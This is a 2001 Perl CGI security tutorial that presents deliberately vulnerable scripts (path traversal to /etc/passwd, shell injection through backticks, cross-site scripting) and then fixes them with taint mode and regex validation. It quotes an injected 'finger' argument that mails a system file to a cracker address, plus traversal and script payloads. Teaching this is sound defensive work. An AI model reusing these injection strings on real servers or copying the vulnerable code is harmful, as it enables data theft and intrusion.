Despite valiant attempts by the marketing departments of Microsoft and Sun, CGI is still the most commonly used architecture for creating dynamic content on the World Wide Web. In this series of tutorials we’ll look at how to write CGI programs. The second tutorial in the series looks at some of the security issues in CGI programming.
This article was originally published by Linux Format in May 2001.
Please note that these tutorials are only left here for historical interest. If you are writing new web applications with Perl these days, you should be considering something based on PSGI and Plack or even something using raw PSGI.
Introduction
Running a CGI program on a web server that is connected to the Internet is actually quite a brave thing to do. You’re giving anyone with an Internet connection permission to run a program on your server. You’d better be very sure that the program is secure and that it won’t allow anyone to do anything that you don’t want them to be able to do. This is an area where many beginners’ CGI tutorials are very weak and as a result there are a large number of web servers that are open to attack from crackers through CGI programs. I don’t want to give the impression that CGI is inherently insecure. It is no more insecure than any other web technology and it’s probably easier to make CGI secure. I just want to make the point that you need to consider security.
What can possibly go wrong?
Before looking at how we can increase the security of our CGI programs, let’s just look at a few examples of what can go wrong.
In the first example you have a simple CGI script that gets the name of a file as a parameter and display that file in the browser. A first attempt at writing this program might look like this.
1 2 3 4 5 6 7 8 9 10 11 12 13 |
#!/usr/bin/perl -w use strict; use CGI ':standard'; my $file = param('filename'); print header(-type => 'text/plain'); open FILE, $file or die "Can't open $file: $!\n"; while (<FILE>) { print; } |
In this case we’re assuming that the ‘filename’ parameter will contain the full path to the file we want to display. I hope it’s obvious why this is a very bad idea. What would happen if someone passed you a filename of “/etc/passwd”? They would get the contents of this file displayed on their browser. Now, I realise that the actual passwords in this file are encrypted, but they will see all of your usernames which gives them a foothold if they are trying to break into your server. And they can run something like “crack” against the password list to see if any of the passwords are particularly weak. All in all a bad idea. And remember that they can see any file on your system in the same way.
So here’s a second version of the script. In this one we assume that the files we want to display are all in the same directory and we’ll restrict the viewer to displaying files from that directory. Or, at least, that’s the plan.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
#!/usr/bin/perl -w use strict; use CGI ':standard'; my $dir = '/path/to/data/files/'; my $file = $dir . param('filename'); print header(-type => 'text/plain'); open FILE, $file or die "Can't open $file: $!\n"; while (<FILE>) { print; } |
At first this looks a lot more secure, but it isn’t. True a cracker can’t use a filename of ‘/etc/passwd/’. But what about ‘../../etc/passwd’ or ‘../../../../etc/passwd’ or whatever is needed to go back up the directory tree to find the file. We need to be far more careful about what data we accept from the user.
In the second example we want to display information about the users who are currently logged on the the server. For this we’ll run the Unix “finger” command, capture the output and display it in the browser. The name of the user to run “finger” against is passed in a parameter. Here’s the basic program (it’s very simple)
1 2 3 4 5 6 7 8 9 10 11 12 |
#!/usr/bin/perl -w use strict; use CGI ':standard'; my $user = param('user'); my $who = `finger $user`; print header(-type => 'text/plain'); print "Here are the results for user $user\n\n"; print $who; |
Again, this is an obvious technique for getting the information back from a Unix command. But consider what might happen if the data passed back in the ‘user’ parameter was “dcross; mail cracker@blackhat.com < /etc/passed”. The backticks in program will simply pass the command to your shell. The correct “finger” command will be executed, but the “mail” command will also run which is probably not something that you want.
The last security nightmare that we’ll look at now involves something called “cross-site scripting” attacks. This problem again comes from being too trusting of our input data. In last month’s article we wrote a simple script which prompted the user for input and wrote an HTML page displaying the data that they had given us. One of the input fields that we used was a text input form which allowed the user to post any data that they wanted as their name. We then displayed that name (twice) as part of the data on the resulting page. Of course as long as people were just entering their name in this field there would be no problem, but see what happens when I enter my name as “Dave Cross<script>alert(‘Gotcha!’)</script>”. As the picture shows, the JavaScript code that we’ve added to the name gets executed as the name is displayed. In this case the JavaScript is harmless but it’s quite possible that it could do a lot of damage. There was a good article on this subject on perl.com recently called “Preventing Cross-site Scripting Attacks”.
For another example of a very real security problem that CGI programs can cause see the box on “Spam Attacks using FormMail” which explains how a well-known CGI program has been hijacked by spammers to send unauthorised emails.
Trust No-One
We’ve now seen a number of ways that CGI programs can be vulnerable to attack from users, how can we protect ourselves from these dangers? The most important thing that you can do is to take a leaf out of Agent Mulder’s book and “Trust No-One”. Never assume anything about the data that you receive from a user. Always put it through the most vigourous checks before using it.
As an example, let’s go back to the file display example. You’ll remember that our major problem here was to prevent a cracker from displaying our /etc/passwd file. One solution that I often hear is that we could create a form which contains a drop-down menu listing all of the files that the user is allowed to see. It would be simple enough to build this list using Perl code like this
1 2 3 4 5 6 7 8 9 10 |
opendir DIR, '/path/to/files' or die $!; print qq(<select name="file" size="1">\n); while (my $file = readdir(DIR)) { next if $file =~ /^\./; # skip '.', '..' and hidden files print qq(<option>$file</option>\n); } print qq(</select>\n>); |
Anyone using this drop-down menu would only be able to choose one of the files that we wanted them to choose, so surely that solves the problem. Well, no, this version is just as unsafe as the previous versions. The key phrase is “anyone using this drop-down menu”. You have no guarantee that the request that goes to your CGI program has been generated from your form. Someone could copy the HTML from your form, alter it to allow them to enter whatever data they want and submit that request to your CGI program. Or they could even write a simple program that allowed them to create any HTTP request they want and submit that to your CGI program (Perl is a particularly good language from writing programs like that!)
So the upshot of all that is that you cannot use a cleverly designed form to protect your program. You have to assume that you’re always dealing with potentially dangerous data and handle it accordingly. Perl (of course) makes it easy to do this.
The first (and most powerful) tool that Perl gives you is taint mode. When Perl is running in taint mode it automatically distrusts any data that it gets from the outside world and won’t let you use that data in many ways until you clean it up. You turn taint mode on by adding “-T” to your shebang line. Here’s an example of a simple (non-CGI) program which demonstrates how taint mode works.
1 2 3 4 5 6 7 8 |
#!/usr/bin/perl -Tw use strict; print 'Enter command: '; my $cmd = <STDIN>; chomp $cmd; print <code>$cmd</code>; |
In this program we prompt the user for a Unix command and print out the result of running that code. If you try to run this program and type in any command (for example “ls”) when prompted, then you’ll see this error
1 |
Insecure dependency in <code></code> while running with -T switch at ./taint.pl line 7, <STDIN> line 1. |
This is Perl’s way of telling you that you tried to do something potentially dangerous with some tainted data. In this case we tried to pass a string to the Unix shell (using the backticks) without checking that the data only contained things that we want to pass to the shell.
The next thing that we need to know, of course, is how to go about cleaning the data. You do this using regular expressions. Here is our previous program rewritten to be taint-safe.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
use strict; $ENV{PATH} = '/bin:/usr/bin:/usr/local/bin'; print "Enter command: "; my $cmd = <STDIN>; chomp $cmd; if ($cmd =~ m|^([\w /\-]+)$|) { $cmd = $1; } else { die "Bad command: $cmd\n"; } print <code>$cmd</code>; |
There are two changes in this version. Firstly we’ve set the path to a known value. This is because Perl in taint mode distrusts the user’s own path as it could potentially have been set to a dangerous value. Secondly we examine the contents of $cmd before calling the shell. We check that the data in $cmd contains only a specific set of characters. That set includes only word characters (alphanumerics and the underscore), spaces, a slash and a dash. This allows commands like “ls”, “ls -l” and “ls -l /home/dave” but excludes multiple commands like “ls; who”. Depending on your specific application the exact set of allowed characters may be different, but you should always keep the set as small as possible.
Having checked that $cmd contains only our allowed characters we use a set of capturing parentheses to extract the value into $1 and then reassign this value to $cmd. It is this action which untaints $cmd. From this point onwards we can be sure that $cmd only contains the data that we want it to contain. Perl also knows this and we can happily pass our data to the shell without generating an error. If $cmd contains invalid characters then the regular expression match will fail and the program dies with an error message.
If you need some revision on Perl’s regular expressions then you should look at the “perlre” manual page that was installed when you installed Perl. For more information that you’ll ever really need, see the book “Mastering Regular Expressions” by Jeffery Friedl.
Now we know about taint mode, we can use this knowledge to write a safer version of our “finger” program.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
#!/usr/bin/perl -wT use strict; use CGI ':standard'; $ENV{PATH} = '/bin:/usr/bin:/usr/local/bin'; my $user = param('user'); if ($user =~ /^(\w+)$/) { $user = $1; } else { die "Invalid user: $user\n"; } my $who = `finger $user`; print header(-type => 'text/plain'); print "Here are the results for user $user\n\n"; print $who; |
We’ve made very similar changes to this program as we did to the previous program. We’ve set the PATH to a known value and we’ve untainted the value in $user by checking it with a regular expression. Notice that in this case we can be far more strict in the set of allowed characters. As we’re just looking for a user name we can just look for one or more word characters. The next figure shows the results of running this program on my local web server passing it the username “dave”.
For more information about taint mode, see the “perlsec” manual page that came with your version of Perl.
Other Safety Nets
Having fixed the problem with our “finger” example, let’s take a look at how we’d solve the other problems we looked at earlier, starting with the file display script. To reiterate the problem, we have a directory that contains text files which we want to display to the user without them also being able to view our /etc/passwd file.
The solution to this is very similar to the solution to our previous problem. We simply use a regular expression that matches our idea of what a filename should be and refuse to do anything if we’re given anything that doesn’t match that. Here is the code
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
#!/usr/bin/perl -wT use strict; use CGI ':standard'; my $dir = '/path/to/data/files/'; my $file = param('filename'); if ($file =~ /^(\w[\w\.]*)$/) { $file = $1; } else { die "Bad filename: $file\n"; } print header(-type => 'text/plain'); open FILE, $file or die "Can't open $file: $!\n"; while (<FILE>) { print; } |
The program takes a familiar form. Only the regular expression has changed. In this case we’re trying to prevent users from entering anything other than a filename in the current directory. We therefore insist that the filename starts with a word character which is optionally followed by any combination of word characters and dots. This allows filenames like “something.txt” or even “something.else.dat” but prevents “/something.txt” or (most importantly) thinks like “../../../etc/passwd”. Any time that you open a file with a name based on user input you should use these kinds of checks.
Preventing Cross-Site Scripting Attacks
The final danger that we mentioned at the start of this article was that of cross-site scripting attacks where a user can insert JavaScript into data that you are going to display on a web page. Ways to get round this vary. If the data that you’re displaying shouldn’t contain any HTML at all then the brute force approach is to replace all ‘<‘ characters with the ‘<’ HTML entity before displaying it to the browser. Here’s how to make that change to last month’s form processing program.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 |
#!/usr/bin/perl -Tw use strict; use CGI ':standard'; my $name = param('name'); my $age = param('age'); my $gender = param('gender'); my @hobbies = param('hobby'); my $list; if (@hobbies) { $list = join ', ', @hobbies; } else { $list = 'None'; } $name =~ s/</</g; $age =~ s/</</g; $gender =~ s/</</g; $list =~ s/</</g; print header, start_html(-title=>$name), h1("Welcome $name"), p('Here are your details:'), table(Tr(td('Name:'), td($name)), Tr(td('Age:'), td($age)), Tr(td('Gender:'), td($gender)), Tr(td('Hobbies:'), td($list))), end_html; |
It’s a very simple change. We’ve simply run the transformation s/</&lt;/g against all of the user input variables to remove any potentially dangerous HTML tags. Notice that we’ve done it to all input and not just the data that comes from a text field. This is because, as I said earlier, we’d can’t relay on the fact that the data has been entered via our form. Here’s the result of trying to run a cross-site scripting attack on our new program. Note the absence of embarrassing JavaScript pop-up windows.
If, however, you want to include the ability for users to enter HTML in their data then you have a lot more work on your hands. You would need to keep a list of allowed HTML tags and attributes. Then you would have to parse the users input to work out exactly what they have tried to enter and remove anything that is not allowed. This is far from trivial and I don’t have enough space in this article to go into any more detail. Id you’d like to see an example of how it’s done, please take a look at the guestbook script from the nms project (see box about CGI script repositories).
Conclusions
I hope I haven’t scared anyone away from CGI programming. These kinds of security issues exist no matter what kind of web technologies your use and they are actually easier to fix in CGI programs than they are in many other technologies.
CGI programming is fun and it is relatively easy to write programs that do interesting and useful stuff. You just have to be aware of everything that can possibly go wrong.
There are a number of good places to go to get more information on CGI security. One of the best is Lincoln Stein’s “WWW Security FAQ”.
In next month’s article we’ll look at some more advanced CGI concepts like using cookies to store user data and using templating systems to separate your HTML from your Perl code.
CGI Script Repositories
Most people who use CGI programs on their web sites don’t write the scripts that they use. There are a large number of sites on the Internet that provide free scripts to download and use. One of the most famous is called “Matt’s Script Archive” and it contains a number of scripts written by a programmer called Matt Wright. Scripts from Matt’s site are in use all over the World Wide Web.
However you should not make the mistake of thinking that popularity and quality are the same thing. It’s long been known amongst the Perl community that the scripts found in most CGI script repositories are of very variable quality. I wrote an article called “Finding CGI Scripts” for perl.com which goes into this issue in some detail. My conclusions were that the people who were most likely to use these scripts were exactly the people least likely to be able to judge the technical quality of the scripts and that this was leading to very insecure scripts being installed on a large number of web servers.
This is why the London Perl Mongers set up the nms project. The aims of this project are to provide a set of scripts which can be used in place of Matt Wright’s scripts. We didn’t choose Matt’s scripts because they were the worst, but simply because they were the most widely used.
The nms programs can be downloaded from http://nms-cgi.sourceforge.net. As I write we have replacements available for all of Matt’s scripts except wwwboard (which is a message board system) but I expect that to be available by the time you read this.
Spam Attacks using FormMail
One of the most popular CGI scripts on the World Wide Web is Matt Wright’s “FormMail”. This script allows you to take the results of an HTML form and have the data sent in an email to a specified recipient. This is a very common requirement and Matt’s script was one of the first freely available scripts to possess this functionality. Many ISPs automatically install this script on clients’ sites.
The problem with this script is that it takes the address that it sends the email to from a form input. This is usually a hidden field in the HTML form but, as we’ve seen, that won’t prevent a determined spammer from overriding that value and sending emails which originate from your server and annoy a large number of people.
This trick has apparently become very well-known amongst spammers and there are even automated “FormMail” detectors in existence which probe web sites looking for FormMail scripts that can be abused. The last eighteen months have seen a huge increase in the amount of spam email sent via unsecured FormMail scripts. Of course, this didn’t go unnoticed by Matt Wright and in July and August 2001 he released three new versions of the script in quick succession in an attempt to fix all of this problem.
Unfortunately the problem wasn’t completely fixed. Whilst the latest version (1.9) is much better, there are still ways to use it as a spam relay. The problems are described in detail at http://www.monkeys.com/anti-spam/formmail-advisory.pdf. It’s worth mentioning that this document is also uncomplimentary about the nms FormMail replacement but I should point out that since the document was written we have fixed all of the security holes in our script.
If you’re using FormMail on your site then you really shouldn’t be using Matt Wright’s version. You should use the nms version instead. If you want to see how bad the problem is then try putting a file called FormMail.pl in your cgi-bin directory which does nothing but log the date, time and query string each time it is called. I run a script like this on a few on my domains and I get between five and ten probes each day on each of these sites.
Very instructive, thank you. I saw the link in Stack Overflow